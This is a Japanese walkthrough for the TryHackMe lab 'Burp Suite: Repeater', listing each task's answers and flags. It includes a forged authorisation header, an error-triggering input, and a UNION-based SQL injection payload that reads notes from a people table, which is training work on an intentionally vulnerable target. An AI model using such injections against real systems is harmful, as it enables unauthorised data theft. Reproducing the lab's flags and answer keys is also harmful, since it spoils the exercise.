概要
TryHackMe「Burp Suite: Repeater」のWalkthroughです。
Task2
Q1.Which sections gives us a more intuitive control over our requests?
A.Inspector
Task3
Q1.Which view will populate when sending a request from the Proxy module to Repeater?
A.Request
Task4
Q1.Which option allows us to visualize the page as it would appear in a web browser?
A.Render
Task5
Q1.Which section in Inspector is specific to POST requests?
A.Body Parameters
Task6
Q1.What is the flag you receive?
Hint.Make sure you leave the two blank lines at the bottom of the request!
FlagAuthorised: Trueヘッダーを付与しルートページにリクエストを送信するとフラグを入手できます。
A.THM{Yzg2MWI2ZDhlYzdlNGFiZTUzZTIzMzVi}
Task7
Q1.What is the flag you receive when you cause a 500 error in the endpoint?
Hint.The idea is to enter unexpected inputs to see how the server will react. For example, instead of a number, you could enter a piece of text or a symbol. Alternatively, you could try entering a number greater than the number of products available (e.g. 1000), or a number less than or equal to 0.
/products/-1などの予期しない値を送信することで、500エラーが発生しフラグを入手できます。
A.THM{N2MzMzFhMTA1MmZiYjA2YWQ4M2ZmMzhl}
Task8
Q1.What is the flag?
/about/0 UNION ALL SELECT notes,null,null,null,null FROM people WHERE id = 1にリクエストを送信し、フラグを入手できます。
A.THM{ZGE3OTUyZGMyMzkwNjJmZjg3Mzk1NjJh}